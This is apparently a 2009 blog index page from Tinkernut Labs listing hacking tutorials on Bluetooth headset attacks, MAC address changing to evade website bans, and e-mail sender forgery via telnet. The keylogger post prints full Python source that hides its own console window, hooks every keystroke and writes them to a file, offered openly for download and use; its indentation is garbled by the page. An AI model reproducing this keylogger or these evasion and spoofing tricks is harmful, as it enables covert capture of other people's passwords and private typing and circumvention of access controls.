Tinkernut Labs



  • How To Hack Bluetooth Headsets

    September 30, 2009 // davisde // DIY Projects, Hacks, Safety & Security Tags: bluetooth, cell, hack, hacking, mobile, sonar, tinkernut, tips, tricks, tutorial, wireless 9 Responses





    This video shows one of the vulnerabilities of some bluetooth headsets. To prevent this vulnerability, it’s best to invest a little more money into a more secure headset and making sure your headset is turned off when not in use. You can find all of the links and scripts used in this video, as well as find answers to questions you may have at the link below:

    http://www.tinkernut.com/groups/videotutorial-extras/forum/topic/how-to-hack-bluetooth-headsets/

  • How To Make A Keylogger

    September 11, 2009 // davisde // Hacks, Programming Tips Tags: computer, hack, hacking, keyboard, keylogger, programming, python, scripts, tinkernut, tips, tricks, tutorial 38 Responses


    KEYLOGGER SOURCECODE AND

    – Download Python: http://www.python.org/

    – Download Pyhook: pyhook.sourceforge.net

    – Download Python for Windows Extensions: http://sourceforge.net/projects/pywin32/

    SOURCE:

    import win32api
    import win32console
    import win32gui
    
    import pythoncom, pyHook
    
    win = win32console.GetConsoleWindow()
    win32gui.ShowWindow(win,0)
    
    def OnKeyboardEvent(event):
     if event.Ascii==5:
            
    _exit(1)
    
     if event.Ascii != 0 or 8:
     f=open('c:output.txt','r')
           
     buffer=f.read()
     f.close()
            
    f=open('c:output.txt','w')
     keylogs=chr(event.Ascii)
           
     if event.Ascii==13:
     keylogs='/n'
     buffer += 
    keylogs
     f.write(buffer)
     f.close()
    
    hm = pyHook.HookManager()
    hm.KeyDown = OnKeyboardEvent
    hm.HookKeyboard()
    pythoncom.PumpMessages()
  • Hacking Tip: Change Your MAC Address

    September 4, 2009 // davisde // Hacks Tags: address, block, bypass, change, game, hack, hacking, hide, ip, mac, sites, tips, tricks, tutorial, website 3 Responses





    This video will show you how to bypass websites that have blocked you by changing your MAC address, which will change your IP address. You can download now download it from this link: http://www.tinkernut.com/demos/205_mac/macmakeup195d.zip

  • Hacking Tip: Forge E-mail Addresses

    May 5, 2008 // davisde // Hacks, Video Tags: email, gmail, hack, hacking, hotmail, how, spoof, to, webmail 7 Responses


    The purpose of this video is to show an e-mail security flaw using telnet that allows hackers to send e-mails using anyone’s e-mail address. Thankfully, many major e-mail providers have software that blocks this. My intention is to make people aware of this flaw so that other e-mail providers can protect themselves as well. An example program for protection can be found at http://www.zsty.com/email.

Newer posts →